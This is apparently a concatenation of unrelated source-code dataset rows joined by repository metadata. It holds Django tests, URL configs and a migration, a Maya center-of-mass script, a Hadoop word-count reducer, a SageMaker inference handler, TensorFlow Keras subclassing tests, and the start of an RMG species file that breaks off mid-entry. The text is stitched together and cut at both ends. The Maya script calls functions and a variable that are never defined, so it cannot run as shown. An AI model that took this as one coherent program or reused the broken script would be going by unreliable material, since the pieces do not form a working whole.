'Field of type: DescriptionLackingField'
)
class AdminDocViewFunctionsTests(SimpleTestCase):
def test_simplify_regex(self):
tests = (
(r'^a', '/a'),
(r'^(?P<a>\w+)/b/(?P<c>\w+)/$', '/<a>/b/<c>/'),
(r'^(?P<a>\w+)/b/(?P<c>\w+)$', '/<a>/b/<c>'),
(r'^(?P<a>\w+)/b/(\w+)$', '/<a>/b/<var>'),
(r'^(?P<a>\w+)/b/((x|y)\w+)$', '/<a>/b/<var>'),
(r'^(?P<a>(x|y))/b/(?P<c>\w+)$', '/<a>/b/<c>'),
(r'^(?P<a>(x|y))/b/(?P<c>\w+)ab', '/<a>/b/<c>ab'),
(r'^(?P<a>(x|y)(\(|\)))/b/(?P<c>\w+)ab', '/<a>/b/<c>ab'),
(r'^a/?$', '/a/'),
)
for pattern, output in tests:
self.assertEqual(simplify_regex(pattern), output)
| [
"[email protected]"
] | |
a5cbd4174a07e88112f6ff2349b897cace44db22 | 581c041a0a32f051508f3b0a167656cb6169c2fe | /project_management/notifications/.svn/text-base/urls.py.svn-base | 86d4d6a3ade25ed394867f009ed21fd231ac89d5 | [] | no_license | raveena17/ILASM | da38258b6739e823b973c2bede2a21dd04e0941e | 7a337e0e3a20180b9564de68ab22620dc9aa1a36 | refs/heads/master | 2022-12-05T14:34:45.929663 | 2019-06-25T14:18:47 | 2019-06-25T14:18:47 | 193,101,540 | 0 | 0 | null | 2022-12-03T15:11:35 | 2019-06-21T13:20:47 | JavaScript | UTF-8 | Python | false | false | 325 | """
urls for event application
"""
from django.conf.urls.defaults import patterns
urlpatterns = patterns('project_management.notifications',
(r'^create/$', 'views.manage_event'),
(r'^update/(?P<id>\d+)/$', 'views.manage_event'),
(r'^list/$', 'views.event_list'),
(r'^delete/$', 'views.delete_event'),
)
| [
"[email protected]"
] | ||
76a97aedfd25a25ec5052821f9d86f5d50382bcd | aa0366a8632f334fb35e6bdc78717f3456202eb7 | /old/bdApiGetCom_v02.py | 676422673aa737b8010d9f1ed60f43dc04226cfb | [] | no_license | Mortaciunea/bdScripts | 0891478096f3a5876655896c9649c0a7204d5ee8 | 4f6e9d2b181bb4a90c1ccfcaca64c22ecbe0dd59 | refs/heads/master | 2020-12-24T13:36:57.930038 | 2015-09-03T16:03:46 | 2015-09-03T16:03:46 | 41,869,547 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,026 | py | import maya.cmds as cmds
import maya.OpenMaya as om
def bdGetCentroid(vectorArray):
center = ((vectorArray[0] - pointInsideVec) + (vectorArray[1] - pointInsideVec) + (vectorArray[2] - pointInsideVec))/4
return center
def bdGetComMain():
mDagObject = om.MDagPath()
mSelList = om.MSelectionList()
mDagPointInside = om.MDagPath()
mSelList.add('pointInsideLoc')
mSelList.getDagPath(0,mDagPointInside)
#mDagPointInside.pop()
mTransformPointInside = om.MFnTransform(mDagPointInside)
mPointInsideVector = mTransformPointInside.getTranslation(om.MSpace.kWorld)
print mDagPointInside.fullPathName()
om.MGlobal.getActiveSelectionList(mSelList)
numSel = mSelList.length()
if numSel == 1:
mSelList.getDagPath(0,mDagObject)
#print mDagObject.fullPathName()
if mDagObject.hasFn(om.MFn.kMesh):
mFnMesh = om.MFnMesh(mDagObject)
volumes = om.MFloatArray()
centers = om.MVectorArray()
for i in range(mFnMesh.numPolygons()):
mVertsId = om.MIntArray()
mFnMesh.getPolygonVertices(i,mVertsId)
mVertPosArray = om.MVectorArray()
for vert in mVertsId:
mVertPos = om.MPoint()
mFnMesh.getPoint(vert,mVertPos)
mPointVector = om.MVector(mVertPos)
mVertPosArray.append(mPointVector)
volumes.append(bdCalculateVolume(mVertPosArray,mPointInsideVector))
centers.append(bdCalculateCenter(mVertPosArray,mPointInsideVector))
totalVolume = 0
for vol in volumes:
totalVolume +=vol
print 'Total Volume :', totalVolume
centerMass = om.MVector()
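            # Center of mass = volume-weighted average of the per-face
            # tetrahedron centroids (all relative to the interior point).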
for i in range(mFnMesh.numPolygons()):
centerMass += centers[i]*volumes[i]
centerMass = centerMass / totalVolume
print centerMass.x, centerMass.y,centerMass.z
mSelList.add('comLoc')
mComLoc = om.MDagPath()
mSelList.getDagPath(1,mComLoc)
mTransformComLoc = om.MFnTransform(mComLoc)
print mComLoc.fullPathName()
mTransformComLoc.translateBy(centerMass,om.MSpace.kWorld)
bdGetComMain() | [
"[email protected]"
] | |
550be29c5bc9d3a289d807df0b4515fa7991f024 | 196cd24f0dcd927779a42a39a5395baa3e3ad9dc | /groups/migrations/0004_auto_20200726_1934.py | 0379bc6dc5af9c21d553711693e9195ceabf0c65 | [
"MIT"
] | permissive | Hedera-Lang-Learn/hedera | d38ac067ebcfa774eb8a916e20144d5e2a079c57 | f44773bcf7695f4f73f0cd71daed7767902bcfd4 | refs/heads/dev | 2023-06-23T01:41:02.429563 | 2023-06-13T20:17:24 | 2023-06-13T20:17:24 | 154,722,012 | 9 | 3 | MIT | 2023-06-13T20:17:25 | 2018-10-25T18:53:59 | Python | UTF-8 | Python | false | false | 844 | py | # Generated by Django 2.2.13 on 2020-07-26 19:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('groups', '0003_auto_20200603_1933'),
]
operations = [
migrations.AddField(
model_name='group',
name='created_at',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='group',
name='created_by',
field=models.ForeignKey(default=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_classes', to=settings.AUTH_USER_MODEL),
),
]
| [
"[email protected]"
] | |
114f7b56097b295584afe4163441cf97202ab66e | 377bc20bb72234f0095eedba83ddbfaad79c50bb | /django05_static/django05_static/urls.py | 9450e495dbe52787cbdc2b33ee89311953865a69 | [] | no_license | choicoding1026/Django | 56fcf9932095829b26037ab5c506882ea31f7f33 | 4bbdf0e0f79175e10f8f75a29c2bc8f0ebd5328c | refs/heads/master | 2022-12-19T20:07:22.904082 | 2020-09-28T08:46:58 | 2020-09-28T08:46:58 | 298,218,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 836 | py | """django05_static URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.urls.conf import include
urlpatterns = [
path('admin/', admin.site.urls),
path('main/', include('myapp.urls')),
]
| [
"[email protected]"
] | |
da278ac32c41ed3843c40753b8dcdc5c5ea6c64f | 272a078b59a1a780ab7cccf4e2741fcd447ca37c | /examples/streaming/wordCount/reducer.py | 39ec1edf7accec778833f3e52b165c3600a8bfbd | [] | no_license | casunlight/hadoop-tutorial | 12dd2594b0990ad452bee01de0a2b6ceabe92501 | 6d45091fc92d39fe495f3f1a69acc493e2fe0c60 | refs/heads/master | 2020-03-26T22:11:56.028574 | 2018-11-26T00:20:41 | 2018-11-26T00:20:41 | 145,439,797 | 2 | 2 | null | 2018-09-11T18:26:26 | 2018-08-20T15:59:39 | Shell | UTF-8 | Python | false | false | 1,076 | py | #!/usr/bin/python
from __future__ import print_function
import sys
#variable initialization
current_word = None
current_count = 0
word = None
# read input line by line from stdin
for line in sys.stdin:
# trim any leading and trailing spaces
line = line.strip()
# split the input from mapper.py and take the word and its count
word, count = line.split('\t', 1)
# convert count string to int
try:
count = int(count)
except ValueError:
        # count was not a number; silently discard this malformed line
continue
# this IF-switch only works because Hadoop sorts map output
# by key (here: word) before it is passed to the reducer
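    # e.g. the sorted stream "apple\t1", "apple\t1", "bee\t1" keeps
    # accumulating apple until the key changes, then emits "apple\t2"
    # before starting to count bee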
if current_word == word:
current_count += count
else:
if current_word:
# write result to STDOUT
print('{}\t{}'.format(current_word, current_count))
current_count = count
current_word = word
# do not forget to output the last word if needed!
if current_word == word:
print('{}\t{}'.format(current_word, current_count))
| [
"[email protected]"
] | |
8706dd9534d6b4516529a80ef067267221875e06 | aca65ed6f3c7e347adb9923fa78da77497624930 | /ex11.py | 03b2cc71ce6a496f5d1cdcbe77ee9e375f4c850b | [] | no_license | bunnybryna/Learn_Python_The_Hard_Way | 516bb76ced2569ea27d9ce50c5d5bc00eeb5740d | c4aeece3b819a228acb2fb77f29551a8683331c4 | refs/heads/master | 2021-01-11T18:04:41.477498 | 2017-01-23T17:42:28 | 2017-01-23T17:42:28 | 79,486,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | print "How old are you? (year)",
age = raw_input()
print "How tall are you? (centimeter)",
height = raw_input()
print "How much do you weigh? (kilogram)",
weight = raw_input()
print "So ,you're %s years old, %s centimeters tall and %s kilograms heavy." % (
age, height, weight)
| [
"[email protected]"
] | |
79fecc2c9c41f461be00ccb461bdb9cef9e811f3 | 6bb45c5892b4c9692dcc44116fb73dc9e7ab90ff | /advanced_functionality/scikit_learn_bring_your_own_model/code/inference.py | 586143a9c2d8e619fe940d1c6006ddefc83d208a | [
"Apache-2.0",
"BSD-2-Clause"
] | permissive | aws/amazon-sagemaker-examples | 8359afe544e873662bda5b8d2b07399c437213c9 | 43dae4b28531cde167598f104f582168b0a4141f | refs/heads/main | 2023-08-26T04:42:52.342776 | 2023-08-25T14:37:19 | 2023-08-25T14:37:19 | 107,937,815 | 4,797 | 3,519 | Apache-2.0 | 2023-09-14T19:47:03 | 2017-10-23T05:55:22 | Jupyter Notebook | UTF-8 | Python | false | false | 487 | py | import os
import joblib
def predict_fn(input_object, model):
###########################################
# Do your custom preprocessing logic here #
###########################################
print("calling model")
predictions = model.predict(input_object)
return predictions
def model_fn(model_dir):
print("loading model.joblib from: {}".format(model_dir))
loaded_model = joblib.load(os.path.join(model_dir, "model.joblib"))
return loaded_model
| [
"[email protected]"
] | |
fdd337731c2630cb780993a60ce66945c2781153 | 17554c4666f40759074dbe204aca6f9b5373d207 | /tensorflow/python/keras/_impl/keras/model_subclassing_test.py | 3d71a620fcb34d21c41f920eed99b1fe22668899 | [
"Apache-2.0"
] | permissive | PACELab/tensorflow-1 | ef92f70c5e5ff4cb3bda9254b8ef66b45f124566 | fff95ee576e266eae9ccf23688849303aa146a3d | refs/heads/master | 2021-01-25T14:34:10.574775 | 2018-03-03T18:14:50 | 2018-03-03T18:14:50 | 123,713,012 | 0 | 1 | Apache-2.0 | 2018-03-03T17:03:35 | 2018-03-03T17:03:35 | null | UTF-8 | Python | false | false | 20,297 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Model subclassing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import numpy as np
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.keras._impl import keras
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.training.rmsprop import RMSPropOptimizer
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class SimpleTestModel(keras.Model):
def __init__(self, use_bn=False, use_dp=False, num_classes=10):
super(SimpleTestModel, self).__init__(name='test_model')
self.use_bn = use_bn
self.use_dp = use_dp
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='softmax')
if self.use_dp:
self.dp = keras.layers.Dropout(0.5)
if self.use_bn:
self.bn = keras.layers.BatchNormalization(axis=-1)
def call(self, inputs):
x = self.dense1(inputs)
if self.use_dp:
x = self.dp(x)
if self.use_bn:
x = self.bn(x)
return self.dense2(x)
class MultiIOTestModel(keras.Model):
def __init__(self, use_bn=False, use_dp=False, num_classes=(2, 3)):
super(MultiIOTestModel, self).__init__(name='test_model')
self.use_bn = use_bn
self.use_dp = use_dp
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes[0], activation='softmax')
self.dense3 = keras.layers.Dense(num_classes[1], activation='softmax')
if use_dp:
self.dp = keras.layers.Dropout(0.5)
if use_bn:
self.bn = keras.layers.BatchNormalization()
def call(self, inputs):
x1, x2 = inputs
x1 = self.dense1(x1)
x2 = self.dense1(x2)
if self.use_dp:
x1 = self.dp(x1)
if self.use_bn:
x2 = self.bn(x2)
return [self.dense2(x1), self.dense3(x2)]
class NestedTestModel1(keras.Model):
"""A model subclass nested inside a model subclass.
"""
def __init__(self, num_classes=2):
super(NestedTestModel1, self).__init__(name='nested_model_1')
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='relu')
self.bn = keras.layers.BatchNormalization()
self.test_net = SimpleTestModel(num_classes=4,
use_bn=True,
use_dp=True)
def call(self, inputs):
x = self.dense1(inputs)
x = self.bn(x)
x = self.test_net(x) # pylint: disable=not-callable
return self.dense2(x)
def get_functional_graph_model(input_dim, num_classes):
# A simple functional-API model (a.k.a. graph network)
inputs = keras.Input(shape=(input_dim,))
x = keras.layers.Dense(32, activation='relu')(inputs)
x = keras.layers.BatchNormalization()(x)
outputs = keras.layers.Dense(num_classes)(x)
return keras.Model(inputs, outputs)
class NestedTestModel2(keras.Model):
"""A model subclass with a functional-API graph network inside.
"""
def __init__(self, num_classes=2):
super(NestedTestModel2, self).__init__(name='nested_model_2')
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='relu')
    self.bn = keras.layers.BatchNormalization()
self.test_net = get_functional_graph_model(32, 4)
def call(self, inputs):
x = self.dense1(inputs)
x = self.bn(x)
x = self.test_net(x)
return self.dense2(x)
def get_nested_model_3(input_dim, num_classes):
# A functional-API model with a subclassed model inside.
# NOTE: this requires the inner subclass to implement `compute_output_shape`.
inputs = keras.Input(shape=(input_dim,))
x = keras.layers.Dense(32, activation='relu')(inputs)
x = keras.layers.BatchNormalization()(x)
class Inner(keras.Model):
def __init__(self):
super(Inner, self).__init__()
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(5, activation='relu')
self.bn = keras.layers.BatchNormalization()
def call(self, inputs):
x = self.dense1(inputs)
x = self.dense2(x)
return self.bn(x)
def compute_output_shape(self, input_shape):
return tensor_shape.TensorShape((input_shape[0], 5))
test_model = Inner()
x = test_model(x) # pylint: disable=not-callable
outputs = keras.layers.Dense(num_classes)(x)
return keras.Model(inputs, outputs, name='nested_model_3')
class ModelSubclassingTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes()
def test_single_io_workflow_with_np_arrays(self):
num_classes = 2
num_samples = 100
input_dim = 50
with self.test_session():
model = SimpleTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
@test_util.run_in_graph_and_eager_modes()
def test_multi_io_workflow_with_np_arrays(self):
num_classes = (2, 3)
num_samples = 1000
input_dim = 50
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
_ = model.evaluate([x1, x2], [y1, y2], verbose=0)
def test_single_io_workflow_with_tensors(self):
num_classes = 2
num_samples = 10
input_dim = 50
with self.test_session():
model = SimpleTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x = array_ops.ones((num_samples, input_dim))
y = array_ops.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, steps_per_epoch=10, verbose=0)
_ = model.evaluate(steps=10, verbose=0)
def test_multi_io_workflow_with_tensors(self):
num_classes = (2, 3)
num_samples = 10
input_dim = 50
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x1 = array_ops.ones((num_samples, input_dim))
x2 = array_ops.ones((num_samples, input_dim))
y1 = array_ops.zeros((num_samples, num_classes[0]))
y2 = array_ops.zeros((num_samples, num_classes[1]))
model.fit([x1, x2], [y1, y2], epochs=2, steps_per_epoch=10, verbose=0)
_ = model.evaluate(steps=10, verbose=0)
def test_multi_io_workflow_with_numpy_arrays_and_custom_placeholders(self):
num_classes = (2, 3)
num_samples = 1000
input_dim = 50
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
x2_placeholder = array_ops.placeholder(
dtype='float32', shape=(None, input_dim))
model._set_inputs([x1, x2_placeholder])
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
_ = model.evaluate([x1, x2], [y1, y2], verbose=0)
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def test_attributes(self):
# layers, weights, trainable_weights, non_trainable_weights, inputs, outputs
num_classes = (2, 3)
num_samples = 100
input_dim = 50
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
self.assertEqual(model.name, 'test_model')
self.assertEqual(model.built, False)
self.assertEqual(len(model.weights), 0)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.train_on_batch([x1, x2], [y1, y2])
self.assertEqual(model.built, True)
self.assertEqual(len(model.layers), 4)
self.assertEqual(len(model.weights), 10)
self.assertEqual(len(model.trainable_weights), 8)
self.assertEqual(len(model.non_trainable_weights), 2)
self.assertEqual(len(model.inputs), 2)
self.assertEqual(len(model.outputs), 2)
@test_util.run_in_graph_and_eager_modes()
def test_updates(self):
# test that updates get run during training
num_samples = 100
input_dim = 50
class BNNet(keras.Model):
def __init__(self):
super(BNNet, self).__init__()
self.bn = keras.layers.BatchNormalization(beta_initializer='ones',
gamma_initializer='ones')
def call(self, inputs):
return self.bn(inputs)
x = np.ones((num_samples, input_dim))
y = np.ones((num_samples, input_dim))
with self.test_session():
model = BNNet()
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
y_ref = model.predict(x)
model.train_on_batch(x, y)
y_new = model.predict(x)
self.assertGreater(np.sum(np.abs(y_ref - y_new)), 0.1)
@test_util.run_in_graph_and_eager_modes()
def test_training_and_inference_behavior(self):
# test that dropout is applied in training and not inference
num_samples = 100
input_dim = 50
class DPNet(keras.Model):
def __init__(self):
super(DPNet, self).__init__()
self.dp = keras.layers.Dropout(0.5)
self.dense = keras.layers.Dense(1,
use_bias=False,
kernel_initializer='ones')
def call(self, inputs):
x = self.dp(inputs)
return self.dense(x)
with self.test_session():
model = DPNet()
x = np.ones((num_samples, input_dim))
y = model.predict(x)
self.assertEqual(np.sum(y), np.sum(x))
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
loss = model.train_on_batch(x, y)
self.assertGreater(loss, 0.1)
@test_util.run_in_graph_and_eager_modes()
def test_training_methods(self):
# test fit, train_on_batch
# on different input types: list, dict
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
model.fit({'input_1': x1, 'input_2': x2},
{'output_1': y1, 'output_2': y2},
epochs=2, batch_size=32)
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0,
validation_data=([x1, x2], [y1, y2]))
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.train_on_batch([x1, x2], [y1, y2])
model.train_on_batch({'input_1': x1, 'input_2': x2},
{'output_1': y1, 'output_2': y2})
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def test_inference_methods(self):
# test predict, evaluate, test_on_batch, predict_on_batch
# on different input types: list, dict
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.evaluate([x1, x2], [y1, y2])
model.test_on_batch([x1, x2], [y1, y2])
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.predict([x1, x2])
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.predict_on_batch([x1, x2])
@test_util.run_in_graph_and_eager_modes()
def test_trainable_mutation(self):
# test that you can change `trainable` on a model or layer, and that
# it freezes the model state during training
# TODO(fchollet): add test after we unify BN behavior in eager and symbolic.
pass
@test_util.run_in_graph_and_eager_modes()
def test_saving(self):
if h5py is None:
return # Skip test if models cannot be saved.
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
y_ref_1, y_ref_2 = model.predict([x1, x2])
fd, fname = tempfile.mkstemp('.h5')
model.save_weights(fname)
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
# need to build the model before loading weights
# (otherwise no weights to load)
model._set_inputs([x1, x2])
model.load_weights(fname)
y1, y2 = model.predict([x1, x2])
self.assertAllClose(y_ref_1, y1, atol=1e-5)
self.assertAllClose(y_ref_2, y2, atol=1e-5)
os.close(fd)
os.remove(fname)
@test_util.run_in_graph_and_eager_modes()
def test_summary(self):
class ToString(object):
def __init__(self):
self.contents = ''
def __call__(self, msg):
self.contents += msg + '\n'
# Single-io
model = SimpleTestModel(num_classes=4, use_bn=True, use_dp=True)
model._set_inputs(np.ones((3, 4))) # need to build model first
print_fn = ToString()
model.summary(print_fn=print_fn)
self.assertTrue('Trainable params: 356' in print_fn.contents)
# Multi-io
model = MultiIOTestModel(num_classes=(5, 6), use_bn=True, use_dp=True)
model._set_inputs([np.ones((3, 4)),
np.ones((3, 4))]) # need to build model first
print_fn = ToString()
model.summary(print_fn=print_fn)
self.assertTrue('Trainable params: 587' in print_fn.contents)
@test_util.run_in_graph_and_eager_modes()
def test_subclass_nested_in_subclass(self):
num_classes = 2
num_samples = 100
input_dim = 50
with self.test_session():
model = NestedTestModel1(num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 8 + len(model.test_net.weights))
self.assertEqual(len(model.non_trainable_weights),
2 + len(model.test_net.non_trainable_weights))
self.assertEqual(len(model.trainable_weights),
6 + len(model.test_net.trainable_weights))
@test_util.run_in_graph_and_eager_modes()
def test_graph_nested_in_subclass(self):
num_classes = 2
num_samples = 100
input_dim = 50
with self.test_session():
model = NestedTestModel2(num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 8 + len(model.test_net.weights))
self.assertEqual(len(model.non_trainable_weights),
2 + len(model.test_net.non_trainable_weights))
self.assertEqual(len(model.trainable_weights),
6 + len(model.test_net.trainable_weights))
@test_util.run_in_graph_and_eager_modes()
def test_subclass_nested_in_graph(self):
num_classes = 2
num_samples = 100
input_dim = 50
with self.test_session():
model = get_nested_model_3(input_dim=input_dim, num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 16)
self.assertEqual(
len(model.non_trainable_weights), 4)
self.assertEqual(len(model.trainable_weights), 12)
@test_util.run_in_graph_and_eager_modes()
def test_support_for_manual_training_arg(self):
# In most cases, the `training` argument is left unspecified, in which
# case it defaults to value corresponding to the Model method being used
# (fit -> True, predict -> False, etc).
# If the user writes their model `call` method to take
# an explicit `training` argument, we must check that the correct value
# is being passed to the model for each method call.
class DPNet(keras.Model):
def __init__(self):
super(DPNet, self).__init__()
self.dp = keras.layers.Dropout(0.5)
self.dense = keras.layers.Dense(1,
use_bias=False,
kernel_initializer='ones')
def call(self, inputs, training=False):
x = self.dp(inputs, training=training)
return self.dense(x)
with self.test_session():
model = DPNet()
x = np.ones((10, 10))
y = model.predict(x)
self.assertEqual(np.sum(y), np.sum(x))
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
loss = model.train_on_batch(x, y)
self.assertGreater(loss, 0.1)
if __name__ == '__main__':
test.main()
| [
"[email protected]"
] | |
6975e4ae224d2fc47695bcd05ebae6980ef10880 | 41fd80f9ccc72a17c2db16b7019312a87d3181e8 | /zhang_local/pdep/network1235_1.py | c8099e96137017a0b095a2519e6f5c6d3a2fd58a | [] | no_license | aberdeendinius/n-heptane | 1510e6704d87283043357aec36317fdb4a2a0c34 | 1806622607f74495477ef3fd772908d94cff04d9 | refs/heads/master | 2020-05-26T02:06:49.084015 | 2019-07-01T15:12:44 | 2019-07-01T15:12:44 | 188,069,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72,209 | py | species(
label = 'C[CH]OC[C]([O])OO(3631)',
structure = SMILES('C[CH]OC[C]([O])OO'),
E0 = (49.4811,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3615,1310,387.5,850,1000,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.23632,0.104008,-0.0001702,1.52915e-07,-5.38939e-11,6093.3,33.8084], Tmin=(100,'K'), Tmax=(825.111,'K')), NASAPolynomial(coeffs=[8.87216,0.0407704,-2.05512e-05,3.97673e-09,-2.75397e-13,5239.71,-4.44785], Tmin=(825.111,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(49.4811,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOCs) + radical(Cs_P) + radical(CCOJ)"""),
)
species(
label = '[CH2]C(=O)OO(1167)',
structure = SMILES('[CH2]C(=O)OO'),
